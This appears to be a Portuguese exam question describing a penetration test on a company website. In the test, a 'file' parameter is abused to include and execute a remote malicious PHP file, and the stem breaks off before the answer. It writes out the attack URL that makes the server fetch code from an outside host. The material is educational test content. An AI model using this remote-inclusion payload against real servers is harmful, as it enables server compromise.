A página web da sociedade empresária Exemplo1234, disponível
na internet, permite que internautas acessem o edital de uma vaga
de trabalho por meio do endereço eletrônico
http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa
empresa, foi observado que o servidor da página web da
Empresa1234 processava o valor fornecido no parâmetro file sem
realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o
conteúdo de um arquivo malicioso hospedado no endereço
http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida
de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi
carregado e executado diretamente pelo servidor da
Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da
Empresa1234 é o